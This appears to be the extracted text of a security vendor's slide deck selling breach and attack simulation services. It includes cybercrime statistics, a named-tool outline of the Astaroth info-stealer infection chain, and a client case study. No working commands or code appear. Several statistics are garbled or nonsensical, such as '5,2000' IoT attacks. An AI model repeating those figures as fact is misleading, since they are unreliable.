breach & attack simulation services · global media and digital marketing firm in the us,...
TRANSCRIPT
C O N F I D E N T I A L
C O N F I D E N T I A L
1
1
BREACH & ATTACK
SIMULATION SERVICES
1
BREACH & ATTACK
SIMULATION SERVICES
C O N F I D E N T I A L
CYBERSECURITY
5,2000 number
of IoT device
attacks
48% of email
attachments are
malicious
1 in 13 web
requests lead
to malware
4.1B data
breaches in
2019
$11.5B ransomware
damages with an
attack every 14 sec in
2019
$6.3M average
cost of a breach
Only 5% of
companies’
Folders are
protected
$5.9M cost of
information loss
206 days
Average time to
identify a breach
50 days the
average cost in
time of a malware
attack
2,244 average
number of hacker
attacks in a day
The financial services
industry incurs the highest
cost from cybercrime at an
average of $18.3 million per
organization
Supply-chain
attacks were up by
78% in 2019
Estimated losses in 2019 for the
healthcare industry $25 billion
Quick Facts Leading Industries Impacted
2
$2.6M average
cost of malware
attack on an
organization
314 days:
Average lifecycle
of a breach
C O N F I D E N T I A L
BREACH & ATTACK
Attack begins with spear-phishing email. WMIC downloads an XSL file.
WMIC once again downloads an XSL file. Multiple instances of Bitsadmin download
encoded payloads.
Certutil decodes the download
payloads.
This DLL decrypts and injects another DLL
into userinit.
The DLL that’s loaded into userinit is a proxy that reads, decrypts,
and reflectively loads a final DLL, which is the info-stealer Astaroth.
Email with link Zip Link BAT
Attackers may need to keep
staging attacks until the desired
information is obtained or the
desired access to the Network is
achieved
Once the attacker maintains
access to the system,
exfiltration can indefinitely
proceed
Attackers looks for
weakness he can exploit
1) RESEARCH Phishing email spam with
malware, phone call, dress
like the night janitor etc..
3
WMICDownloadXSL fileJavaScript
WMIC Download XSL file JavaScript
Bitsadmin Download
Regsvr32
Reflective
DLL loading DLL Process hallowingUserinit
Regsvr32 DLL DLL Reflective
DLL loadingDLL Process
injection
CertutilDecodePayloads
2) STAGE ATTACK
SOCIAL
ENGINEERING
INFRASTRUCTURE
WEAKNESS
3) EXFILTRATE
Access data is exfiltrated
back to attacker
HTTP-based path,
FTP, Gopher etc….,
Database and
file servers
C O N F I D E N T I A L
OUTPUT
Detailed reports of the status and performance of security controls and processes
Taxonomy consists of common lexicon that enables business stakeholders, cyber
defenders, and vendors to clearly communicate on the exact nature of a threat and the
objective assessment of the cyber defense plan that can defeat it.
SIMULATIONS
Ransomware attacks, (spear) phishing and whaling attacks, or clicking on
malicious banners and links on websites; full attack and expanded kill chain used
by cyber attackers against enterprise infrastructure using software test points that
allow testing across roaming laptops, user desktops, virtual machines, or cloud
infrastructure.
APPROACH
Methodically select and analyze attacks, compare them to the capabilities of an
organization’s security controls, identify the gaps and mitigate with security controls
aligned to organization’s budgets
Defense-in-depth architecture include detective controls designed to monitor and
alert on anomalous activity
Assess the effectiveness of security procedures, infrastructure, vulnerabilities, and
techniques by using breach and attack simulation Platforms; expose vulnerability
gaps with respective configurations.
BREACH & ATTACK
Response to CISO’s key questions
Marlabs’ Cybersecurity – Methodology
& Frameworks
NIST MITRE
What is our risk of a
successful breach threat
actors such as APT29?
Are we protected, such
as against APT29?
4
C O N F I D E N T I A L
ENGAGEMENT MODEL
Assessments
Workshops
Implementation & deployment
Managed Services
5
C O N F I D E N T I A L
CASE STUDY: BREACH AND ATTACK SIMULATION
Business
Challenges
Solution
Highlights
Business
Benefits
Proactive threat
mitigation
ClientGlobal Media and digital marketing firm in the US, Europe & APAC
Validate security controls against APT’s Incident response readiness
Report weaknesses in
each phase of kill chain
Workshop based delivery
model
Recommendation on
detection improvement
Coverage of TTP’s
w.r.t MITRE Attack
Matrix
Improved visibility Augmented security
controlsMaximized existing cyber
security investments
6
C O N F I D E N T I A L
C O N F I D E N T I A L
BRINGING TOGETHER
TECHNOLOGY, CULTURE AND VALUETO HELP ENTERPRISES GET READY FOR CHANGE
THANK YOU
7